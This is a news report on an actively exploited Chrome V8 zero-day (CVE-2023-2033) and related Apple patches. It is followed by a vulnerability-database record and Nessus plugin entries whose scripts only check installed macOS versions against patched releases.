Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year.
Tracked as **CVE-2023-2033**, the high-severity vulnerability has been described as a [type confusion issue](<https://cwe.mitre.org/data/definitions/843.html>) in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on April 11, 2023.
"Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," [according](<https://nvd.nist.gov/vuln/detail/CVE-2023-2033>) to NIST's National Vulnerability Database (NVD).
The tech giant [acknowledged](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>) that "an exploit for CVE-2023-2033 exists in the wild," but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.
CVE-2023-2033 also appears to share similarities with [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>), [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>), [CVE-2022-3723](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>), and [CVE-2022-4262](<https://thehackernews.com/2022/12/google-rolls-out-new-chrome-browser.html>) – four other actively abused type confusion flaws in V8 that were remediated by Google in 2022.
Google closed out a total of nine zero-days in Chrome last year. The development comes days after Citizen Lab and Microsoft [disclosed](<https://thehackernews.com/2023/04/israel-based-spyware-firm-quadream.html>) the exploitation of a now-patched flaw in Apple iOS by customers of a shadowy spyware vendor named QuaDream to target journalists, political opposition figures, and an NGO worker in 2021.
It also comes within a week of Apple releasing updates to patch two actively exploited zero-day vulnerabilities ([CVE-2023-28205 and CVE-2023-28206](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>)) in iOS, iPadOS, macOS, and the Safari web browser that could lead to arbitrary code execution.
Users are advised to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.
{"id": "THN:CDFC216AC6B26D35C38BDB32822B4E96", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg1CUbcQScbnTemjH3z-9z7l3lye-ZJqruEuNRoONKxyXz0UkWl_skXsdzuxg5Cyw6VemvnadXx5JVa-UgtYCu3ALMbFcng4yzhHI3pVtvVU9eqkmGx2H7nPIMkGapwSvVPx5HY2ASP51LVelcKSJzC0nGN6Hzq-5upm_ZDqq02Ljx_s0wB8inyj242/s728-e365/google-chrome.png>)\n\nGoogle on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year.\n\nTracked as **CVE-2023-2033**, the high-severity vulnerability has been described as a [type confusion issue](<https://cwe.mitre.org/data/definitions/843.html>) in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on April 11, 2023.\n\n\"Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page,\" [according](<https://nvd.nist.gov/vuln/detail/CVE-2023-2033>) to the NIST's National Vulnerability Database (NVD).\n\nThe tech giant [acknowledged](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>) that \"an exploit for CVE-2023-2033 exists in the wild,\" but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.\n\nCVE-2023-2033 also appears to share similarities with [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>), [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>), [CVE-2022-3723](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>), and 
[CVE-2022-4262](<https://thehackernews.com/2022/12/google-rolls-out-new-chrome-browser.html>) \u2013 four other actively abused type confusion flaws in V8 that were remediated by Google in 2022.\n\nGoogle closed out a total of nine zero-days in Chrome last year. The development comes days after Citizen Lab and Microsoft [disclosed](<https://thehackernews.com/2023/04/israel-based-spyware-firm-quadream.html>) the exploitation of a now-patched flaw in Apple iOS by customers of a shadowy spyware vendor named QuaDream to target journalists, political opposition figures, and an NGO worker in 2021.\n\nIt also comes within a week of Apple releasing updates to patch two actively exploited zero-day vulnerabilities ([CVE-2023-28205 and CVE-2023-28206](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>)) in iOS, iPadOS, macOS, and Safari web browser that could lead to arbitrary code execution.\n\nUsers are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? 
Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2023-04-15T03:58:00", "modified": "2023-04-17T06:21:11", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2023/04/google-releases-urgent-chrome-update-to.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-3723", "CVE-2022-4262", "CVE-2023-2033", "CVE-2023-28205", "CVE-2023-28206"], "immutableFields": [], "lastseen": "2023-04-17T06:59:37", "viewCount": 92, "enchantments": {"dependencies": {"references": [{"type": "altlinux", "idList": ["AF33DF2FCB7CD238CA2AC81CF198F71E"]}, {"type": "apple", "idList": ["APPLE:17ECDD9D843E3FB37FB8F9A31FE36A99", "APPLE:4D00E7FBD6D305B98412E984CF5CBEB0", "APPLE:522AA8B4B44916121871E87266D0A714", "APPLE:99268A3B7560FFD18FBA01ACF4C3686D", "APPLE:C0D7C1E42F184FC31F8109C2C5484099", "APPLE:D5B90B4C3FFEF1EFC2D895F960EB301D"]}, {"type": "attackerkb", "idList": ["AKB:134D4E7D-267A-488A-A5A6-579DB92BB20D", "AKB:1F95080F-4C69-401E-9659-D6FBB9B68458", "AKB:64665D95-5095-4796-9404-96BAEED41106", "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "AKB:79231140-E51A-4D22-BCAC-EE105E3A962C", "AKB:FF8776A0-8F09-4620-A059-9AA63732C37D"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "AVLEONOV:8FE7F4C2B563A2A88EB2DA8822A13824", "AVLEONOV:B4AA36B0AF8AA2D059C914E5F2B15CC0", "AVLEONOV:E5467F48E50B8E100B59F5D3A20F8BC8", 
"AVLEONOV:FDBB133A2C9231CE02F5A15C4AC02F24"]}, {"type": "chrome", "idList": ["GCSA-272405271979539515", "GCSA-2955998722942640296", "GCSA-3812047510544759764", "GCSA-6591445864469691028", "GCSA-7014549802422661685", "GCSA-747586420530407117"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2022-1096", "CISA-KEV-CVE-2022-1364", "CISA-KEV-CVE-2022-3723", "CISA-KEV-CVE-2022-4262", "CISA-KEV-CVE-2023-28205", "CISA-KEV-CVE-2023-28206"]}, {"type": "cnvd", "idList": ["CNVD-2022-85092"]}, {"type": "cve", "idList": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-3723", "CVE-2022-4262", "CVE-2023-2033", "CVE-2023-28205", "CVE-2023-28206"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5110-1:CD232", "DEBIAN:DSA-5121-1:3B3A1", "DEBIAN:DSA-5263-1:A8269", "DEBIAN:DSA-5295-1:10985", "DEBIAN:DSA-5390-1:E9996"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-1096", "DEBIANCVE:CVE-2022-1364", "DEBIANCVE:CVE-2022-3723", "DEBIANCVE:CVE-2022-4262", "DEBIANCVE:CVE-2023-2033"]}, {"type": "fedora", "idList": ["FEDORA:0BF68306D452", "FEDORA:25D31307CC0A", "FEDORA:2A81C3067778", "FEDORA:7264F30C2A76", "FEDORA:B033C30C3DD2", "FEDORA:E6CD0309D335"]}, {"type": "freebsd", "idList": ["1225C888-56EA-11ED-B5C3-3065EC8FD3EC", "2899DA38-7300-11ED-92CE-3065EC8FD3EC", "323F900D-AC6D-11EC-A0B8-3065EC8FD3EC", "6F0327D4-9902-4042-9B68-6FC2266944BC", "A25EA27B-BCED-11EC-87B5-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202208-25"]}, {"type": "github", "idList": ["GITHUB:D9472F716C46C02F88677DBAD0EEA334"]}, {"type": "githubexploit", "idList": ["D424D6C6-13F7-5CAE-8771-9103296520B9"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:1803306DD93E61E87A6FDA05BE06FDF8", "HIVEPRO:573E7326CF205779BA6C4D3AB8DDB736", "HIVEPRO:8BBDC3730B0C7EEC6924023913800CB9", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "ics", "idList": ["ICSA-22-209-01"]}, {"type": "kaspersky", 
"idList": ["KLA12492", "KLA12513", "KLA12529", "KLA20035", "KLA20109", "KLA20196"]}, {"type": "krebs", "idList": ["KREBS:6AC9E60DC3816008721D063978E4A564"]}, {"type": "mageia", "idList": ["MGASA-2022-0118", "MGASA-2022-0146", "MGASA-2022-0419", "MGASA-2022-0451"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "MALWAREBYTES:4FCBD5A9882474969BB67DE6ECA7A4C7", "MALWAREBYTES:B487BF5B3E6EA5BB5C7CABAF0083C8A5", "MALWAREBYTES:CBCD880E5209A5267DCBEB5FB041C435"]}, {"type": "mscve", "idList": ["MS:CVE-2022-1096", "MS:CVE-2022-1364", "MS:CVE-2022-3723", "MS:CVE-2022-4262", "MS:CVE-2023-2033"]}, {"type": "nessus", "idList": ["701396.PASL", "701400.PASL", "701429.PASL", "APPLE_IOS_1575_CHECK.NBIN", "APPLE_IOS_1641_CHECK.NBIN", "DEBIAN_DSA-5110.NASL", "DEBIAN_DSA-5121.NASL", "DEBIAN_DSA-5263.NASL", "DEBIAN_DSA-5295.NASL", "FREEBSD_PKG_1225C88856EA11EDB5C33065EC8FD3EC.NASL", "FREEBSD_PKG_2899DA38730011ED92CE3065EC8FD3EC.NASL", "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "FREEBSD_PKG_6F0327D4990240429B686FC2266944BC.NASL", "FREEBSD_PKG_A25EA27BBCED11EC87B53065EC8FD3EC.NASL", "GENTOO_GLSA-202208-25.NASL", "GOOGLE_CHROME_100_0_4896_127.NASL", "GOOGLE_CHROME_107_0_5304_87.NASL", "GOOGLE_CHROME_108_0_5359_94.NASL", "GOOGLE_CHROME_112_0_5615_121.NASL", "GOOGLE_CHROME_99_0_4844_84.NASL", "MACOSX_GOOGLE_CHROME_100_0_4896_127.NASL", "MACOSX_GOOGLE_CHROME_107_0_5304_87.NASL", "MACOSX_GOOGLE_CHROME_108_0_5359_94.NASL", "MACOSX_GOOGLE_CHROME_112_0_5615_121.NASL", "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "MACOS_HT213721.NASL", "MACOS_HT213724.NASL", "MACOS_HT213725.NASL", "MICROSOFT_EDGE_CHROMIUM_100_0_1185_44.NASL", "MICROSOFT_EDGE_CHROMIUM_107_0_1418_26.NASL", "MICROSOFT_EDGE_CHROMIUM_108_0_1462_41.NASL", "MICROSOFT_EDGE_CHROMIUM_108_0_1462_42.NASL", "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "OPENSUSE-2022-0114-1.NASL", "OPENSUSE-2022-10177-1.NASL", "OPENSUSE-2022-10180-1.NASL", 
"OPENSUSE-2022-10218-1.NASL", "OPENSUSE-2022-10219-1.NASL", "OPENSUSE-2022-10236-1.NASL", "OPENSUSE-2022-10254-1.NASL", "UBUNTU_USN-5350-1.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-5110-1", "OSV:DSA-5121-1", "OSV:DSA-5263-1", "OSV:DSA-5295-1", "OSV:DSA-5390-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167516"]}, {"type": "qt", "idList": ["QT:B64AD93E56170FC29816162A7B78DDBC"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:058E013CF475F33D6DEBB8955340D15B", "QUALYSBLOG:2FF98A895C020ED1CE5E7F898BD6BA9A", "QUALYSBLOG:5A5DF56C2B4E5DB4176574A83F54FECB", "QUALYSBLOG:61F9CF49EC3AE08D7038DF2EB7A34AC9", "QUALYSBLOG:E44F97839C7555E7A3CA4C08F8074CFD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2022-1364", "RH:CVE-2023-28205"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0091-1", "OPENSUSE-SU-2022:0103-1", "OPENSUSE-SU-2022:0110-1", "OPENSUSE-SU-2022:0114-1", "OPENSUSE-SU-2022:0123-1", "OPENSUSE-SU-2022:0156-1", "OPENSUSE-SU-2022:10177-1", "OPENSUSE-SU-2022:10180-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0590B57B0EE82F183D901AD4C42EB516"]}, {"type": "thn", "idList": ["THN:0ADE883013E260B4548F6E16D65487D3", "THN:222F7713CA968509F8C385BA29B0B6A5", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:2FB8A3C1E526D1FFA1477D35F0F70BF4", "THN:31DAA0B9538D69BB42EFB6567298FF49", "THN:C9CB70D59541495680ADDB984FFECDD0", "THN:CE48B3DDA855F117035F84E39BB0D811", "THN:E48AEFF468AB8445D91A32B6F5D7A770", "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "THN:ED17BB6E1286DD4E36EFE5877F25B545", "THN:EDC4E93542AFAF751E67BF527C826DA4", "THN:FFFF05ECDE44C9ED26B53D328B60689B"]}, {"type": "threatpost", "idList": ["THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:A8A7A761CD72E2732BD9E3C75C4A2ACC"]}, {"type": "trellix", "idList": ["TRELLIX:8CB786600FA7F187E3D16B1E340639C2", 
"TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4"]}, {"type": "ubuntu", "idList": ["USN-5350-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-1096", "UB:CVE-2022-1364", "UB:CVE-2022-3723", "UB:CVE-2022-4262"]}, {"type": "veracode", "idList": ["VERACODE:34866", "VERACODE:35135", "VERACODE:38026", "VERACODE:38403"]}]}, "epss": [{"cve": "CVE-2022-1096", "epss": 0.00363, "percentile": 0.68092, "modified": "2023-04-16"}, {"cve": "CVE-2022-1364", "epss": 0.00604, "percentile": 0.75369, "modified": "2023-04-16"}, {"cve": "CVE-2022-3723", "epss": 0.00205, "percentile": 0.569, "modified": "2023-04-16"}, {"cve": "CVE-2022-4262", "epss": 0.00234, "percentile": 0.59958, "modified": "2023-04-16"}, {"cve": "CVE-2023-2033", "epss": 0.00047, "percentile": 0.14122, "modified": "2023-04-16"}, {"cve": "CVE-2023-28205", "epss": 0.01729, "percentile": 0.86015, "modified": "2023-04-16"}, {"cve": "CVE-2023-28206", "epss": 0.00664, "percentile": 0.76659, "modified": "2023-04-16"}], "score": {"value": 9.1, "vector": "NONE"}, "vulnersScore": 9.1}, "_state": {"dependencies": 1681715408, "score": 1698856110, "epss": 1681715872}, "_internal": {"score_hash": "362ea73be8a2da000fdad3c4500293c4"}}
{"nessus": [{"lastseen": "2023-10-22T17:40:02", "description": "The remote host is running a version of macOS / Mac OS X that is 13.x prior to 13.3.1. It is, therefore, affected by multiple vulnerabilities:\n\n - An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28206)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for these issues but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2023-04-07T00:00:00", "type": "nessus", "title": "macOS 13.x < 13.3.1 Multiple Vulnerabilities (HT213721)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213721.NASL", "href": "https://www.tenable.com/plugins/nessus/174022", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174022);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2023-28205\", \"CVE-2023-28206\");\n script_xref(name:\"APPLE-SA\", value:\"HT213721\");\n script_xref(name:\"IAVA\", value:\"2023-A-0177-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"macOS 13.x < 13.3.1 Multiple Vulnerabilities (HT213721)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 13.x prior to 13.3.1. 
It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28206)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for these issues but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213721\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 13.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '13.3.1', 'min_version' : '13.0', 'fixed_display' : 'macOS Ventura 13.3.1' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-22T17:40:02", "description": "The version of Apple iOS running on the mobile device is prior to 15.7.5. It is, therefore, affected by multiple vulnerabilities.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\n - An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Big Sur 11.7.6, macOS Ventura 13.3.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. 
(CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-13T00:00:00", "type": "nessus", "title": "Apple iOS < 15.7.5 Multiple Vulnerabilities (HT213723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_1575_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/174215", "sourceData": "Binary data apple_ios_1575_check.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-22T17:39:18", "description": "The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.6.5. It is, therefore, affected by a vulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2023-04-10T00:00:00", "type": "nessus", "title": "macOS 12.x < 12.6.5 (HT213724)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213724.NASL", "href": "https://www.tenable.com/plugins/nessus/174036", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174036);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2023-28206\");\n script_xref(name:\"APPLE-SA\", value:\"HT213724\");\n script_xref(name:\"IAVA\", value:\"2023-A-0177-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"macOS 12.x < 12.6.5 (HT213724)\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote host is missing a macOS update that fixes a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.6.5. It is, therefore, affected by a\nvulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213724\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 12.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28206\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '12.6.5', 'min_version' : '12.0', 'fixed_display' : 'macOS Monterey 12.6.5' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-22T13:17:45", "description": "The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.7.6. It is, therefore, affected by a vulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. 
(CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2023-04-10T00:00:00", "type": "nessus", "title": "macOS 11.x < 11.7.6 (HT213725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213725.NASL", "href": "https://www.tenable.com/plugins/nessus/174037", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174037);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2023-28206\");\n script_xref(name:\"APPLE-SA\", value:\"HT213725\");\n script_xref(name:\"IAVA\", value:\"2023-A-0177-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"macOS 11.x < 11.7.6 (HT213725)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.7.6. It is, therefore, affected by a\nvulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. 
(CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213725\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 11.7.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28206\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security 